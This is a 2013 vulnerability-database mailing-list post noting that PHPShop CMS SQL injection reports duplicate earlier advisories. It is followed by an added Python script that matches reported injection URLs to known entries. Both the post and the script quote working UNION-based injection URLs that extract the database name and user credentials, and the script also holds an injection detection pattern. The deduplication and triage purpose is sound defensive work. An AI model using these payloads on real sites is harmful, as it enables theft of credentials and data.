[VIM] PHPShop CMS Multiple SQL Injection Vulnerabilities

George A. Theall theall at tenable.com
Wed Jan 16 06:43:10 CST 2013


BID 57320 was created yesterday for the SQL injections reported in EDB-ID 24108:

  http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- 
  http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

These are among the issues reported in http://archives.neohapsis.com/archives/bugtraq/2009-12/0099.html and covered already by BID 37227

And the shop/flypage one was also reported earlier in http://archives.neohapsis.com/archives/bugtraq/2008-02/0014.html and is covered by BID 27570

Rob / Venkat?

George
-- 
theall at tenable.com
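The duplicate check made in the message above can be mechanized by keying each reported proof-of-concept URL on its (page, injected parameter) pair and looking that pair up among existing entries. This is an added example, not part of the original post: the `KNOWN` index layout, the function names and the third sample URL are assumptions constructed for illustration, while the BID assignments follow the message.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed index of already-tracked issues, keyed by (page, parameter).
# BID assignments are taken from the message; the layout is an assumption.
KNOWN = {
    ("admin/function_list", "module_id"): ["BID 37227"],
    ("shop/flypage", "product_id"): ["BID 37227", "BID 27570"],
}

# A value carrying any of these is treated as the injected parameter.
SQL_MARKERS = re.compile(r"'|/\*|--|\bunion\b|\bselect\b", re.IGNORECASE)

def injection_points(url):
    """Return (page, parameter) pairs whose value carries SQL metacharacters."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    page = dict(params).get("page", "")
    return [(page, name) for name, value in params
            if name != "page" and SQL_MARKERS.search(value)]

def triage(url, known=KNOWN):
    """Map each injection point in a reported URL to existing entries.

    An empty list means no tracked entry matches (candidate new issue).
    """
    return {point: known.get(point, []) for point in injection_points(url)}

# The first two URLs are the ones quoted in the message (EDB-ID 24108).
# The third is constructed: its page and parameter are placeholders only.
REPORTS = [
    "http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' "
    "union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- ",
    "http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'"
    "/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,"
    "1,1,1,1,username/**/from/**/auth_user_md5--",
    "http://localhost/phpshop 2.0/?page=demo/placeholder&x_id=1'",
]

if __name__ == "__main__":
    for report in REPORTS:
        for (page, param), bids in triage(report).items():
            verdict = "duplicate of " + ", ".join(bids) if bids else "no match"
            print(f"{page} [{param}]: {verdict}")
```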